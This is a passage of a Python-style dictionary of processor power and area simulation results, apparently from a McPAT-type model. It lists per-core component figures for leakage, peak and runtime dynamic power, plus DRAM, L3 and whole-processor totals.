'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.152811,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0771338,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.324684,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.105326,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.06483,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0037311,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00397379,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0303296,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0293886,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0340607,
'Execution Unit/Register Files/Runtime Dynamic': 0.0333624,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0649051,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.160929,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.13021,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00110915,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00110915,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000977048,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000384237,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00042217,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00361751,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0102421,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.028252,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.79707,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0917619,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0959566,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.1028,
'Instruction Fetch Unit/Runtime Dynamic': 0.22983,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.058588,
'L2/Runtime Dynamic': 0.0164416,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91964,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.352733,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0220812,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0220812,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.02391,
'Load Store Unit/Runtime Dynamic': 0.483711,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0544484,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.108897,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0193239,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0202021,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.111735,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0150482,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.301039,
'Memory Management Unit/Runtime Dynamic': 0.0352503,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.1406,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.00981479,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00439382,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0480758,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0622844,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.95773,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.222955,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.377807,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.2034,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.311228,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.501999,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.253392,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.06662,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.171456,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 6.2792,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.227348,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0130543,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.177895,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0965445,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.405243,
'Execution Unit/Register Files/Runtime Dynamic': 0.109599,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.430526,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.841634,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.80104,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000732837,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000732837,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000637026,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000245906,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00138687,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00348957,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0070719,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0928107,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.90356,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.229625,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.315227,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.40858,
'Instruction Fetch Unit/Runtime Dynamic': 0.648225,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0626646,
'L2/Runtime Dynamic': 0.00572501,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.84618,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.778221,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0520569,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0520569,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.092,
'Load Store Unit/Runtime Dynamic': 1.087,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.128363,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.256727,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0455566,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0464908,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.367061,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.037664,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.601429,
'Memory Management Unit/Runtime Dynamic': 0.0841549,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 22.0334,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.598048,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0213199,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.143953,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.763321,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.38947,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 3.8894168404944898,
'Runtime Dynamic': 3.8894168404944898,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.342426,
'Runtime Dynamic': 0.166856,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 75.0789,
'Peak Power': 108.191,
'Runtime Dynamic': 15.5163,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 74.7365,
'Total Cores/Runtime Dynamic': 15.3495,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.342426,
'Total L3s/Runtime Dynamic': 0.166856,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
